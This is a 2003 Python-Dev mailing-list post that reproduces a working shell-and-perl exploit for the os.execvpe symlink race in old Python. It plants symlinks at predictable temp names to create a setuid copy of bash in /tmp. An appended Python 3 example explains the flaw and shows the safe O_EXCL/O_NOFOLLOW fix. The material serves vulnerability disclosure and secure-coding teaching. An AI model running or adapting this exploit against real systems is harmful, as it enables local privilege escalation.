[Python-Dev] FWD: Python execvpe symlink race condition.
logistix
logi.stix@verizon.net
Sun, 16 Feb 2003 18:22:32 -0500
Not to beat a dead horse, but the exploit code is published at:
http://www.ad2u.gr/index.php?topic=Exploits
It does work on my (unpatched vmware) RedHat 7.3, although (as the
notice stated) it creates a suidshell as the user who runs the script,
not root. It also needs to be modified to use python2 on RedHat.
Here's the code:
#!/bin/sh
echo "Python < 2.2.2 Symlink Race Condition exploit"
echo "Access-=-Denied Networks (c) mzozd@ad2u.gr, 2003"
echo "This is a proof of concept code!!! For educational purposes only"
evilcmd="#!/bin/sh\ncp /bin/bash /tmp/.sh\nchmod 4755 /tmp/.sh\n"
status="??"
echo "Creating suidshell script"
echo -e $evilcmd > /tmp/runme.sh
chmod 755 /tmp/runme.sh
perl -e 'while (1) { open ps,"ps -ef | grep -v grep | grep -v PID |";
while (<ps>) {@args = split " ", $_;if (/python/) {$args[2] = "@";
symlink("/tmp/runme.sh","/tmp/$args[2]$args[1].0");}}}'&
echo "Building python file..."
echo -e "import os\nos.execvpe('echo',['echo','-n','.'],os.environ)" > /tmp/python.py
echo "Be patient, it will take a few moments"
while [ "$status" != "ok" ]
do
    python /tmp/python.py
    if test -e /tmp/.sh; then
        status="ok"
    fi
done
echo -e "\nYou got your suidshell..."
ls -al /tmp/.sh
echo "Cleaning environment"
killall -9 perl
rm -rf /tmp/runme.sh /tmp/*.0 /tmp/python.py
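The post does not say why the file name is guessable: the affected os.execvpe() probed for a "definitely missing" file using tempfile.mktemp(), whose names followed the `@<pid>.<n>` pattern the perl loop above reproduces, and execv() followed whatever was planted there. The following is an added Python 3 example, not code from the post, that shows the same symlink race against a predictable name and the open-flag discipline that defeats it; the `@<pid>.0` name, the scratch directory and the "victim" file are constructed for the demonstration.

```python
import os
import tempfile


def predictable_name(tmpdir: str, pid: int, seq: int = 0) -> str:
    """Name in the style of the old '@<pid>.<n>' tempfile template.

    Constructed for this demo: the race works because another user can
    compute this name from 'ps' output, exactly as the perl loop does."""
    return os.path.join(tmpdir, f"@{pid}.{seq}")


def unsafe_write(path: str, data: bytes) -> None:
    """Vulnerable pattern: trust a predictable name and open() it.

    open() follows symlinks, so a link planted at `path` beforehand
    redirects the write to whatever the link points at."""
    with open(path, "wb") as fh:
        fh.write(data)


def safe_write(path: str, data: bytes) -> None:
    """Hardened pattern: atomic create, never follow a planted link.

    O_CREAT|O_EXCL fails with EEXIST if anything (a symlink included)
    already sits at `path`; O_NOFOLLOW additionally rejects links where
    the platform supports it. Either way nothing is written through."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)


def demo() -> dict:
    """Plant a symlink at the predictable name, then try both writers.

    Returns the victim's contents after the unsafe write and whether the
    hardened writer refused to touch the planted link."""
    with tempfile.TemporaryDirectory() as tmpdir:
        victim = os.path.join(tmpdir, "victim")  # stands in for /tmp/runme.sh
        with open(victim, "wb") as fh:
            fh.write(b"original")
        name = predictable_name(tmpdir, os.getpid())
        os.symlink(victim, name)            # attacker's step from the post
        unsafe_write(name, b"clobbered")    # follows the link: victim changed
        try:
            safe_write(name, b"clobbered again")
            refused = False
        except FileExistsError:
            refused = True
        with open(victim, "rb") as fh:
            after_unsafe = fh.read()
    return {"target_after_unsafe": after_unsafe, "safe_refused": refused}
```

Run demo() to see the unsafe writer overwrite the victim through the link while the hardened writer raises instead; the same O_EXCL/O_NOFOLLOW rule is what tempfile.mkstemp() applies for you.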